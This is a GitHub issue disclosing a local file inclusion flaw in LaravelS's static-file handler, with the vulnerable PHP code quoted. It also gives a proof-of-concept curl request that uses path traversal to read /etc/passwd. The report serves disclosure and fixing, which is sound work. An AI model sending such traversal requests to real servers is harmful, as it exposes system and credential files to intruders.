Local File Inclusion (LFI) vulnerability

Question

Local File Inclusion (LFI) vulnerability

zhazhami opened this issue a year ago · comments

zzm commented a year ago

Your software version (Screenshot of your startup)

Software Version

PHP 8.1

Swoole 5.0.2

Laravel/Lumen 8.83

LaravelS 3.7.35

Detail description about this issue(error/log)

When the settings "handle_static" is true, LaravelS is affected by a LFI vulnerability.

vulnerable file: /src/Illuminate/Laravel.php

public function handleStatic(IlluminateRequest $request)
{
    $uri = $request->getRequestUri();
    if (isset(self::$staticBlackList[$uri])) {
        return false;
    }
    $uri = (string)str_replace("\0", '', urldecode($uri));

    $requestFile = $this->conf['static_path'] . $uri;
    if (is_file($requestFile)) {
        return $this->createStaticResponse($requestFile, $request);
    }
    ...

Some reproducible code blocks and steps
vulnerability poc

curl --path-as-is "http://127.0.0.1:5200/../../../../../../etc/passwd"

Biao Xie commented a year ago

Thanks.

Software	Version
PHP	8.1
Swoole	5.0.2
Laravel/Lumen	8.83
LaravelS	3.7.35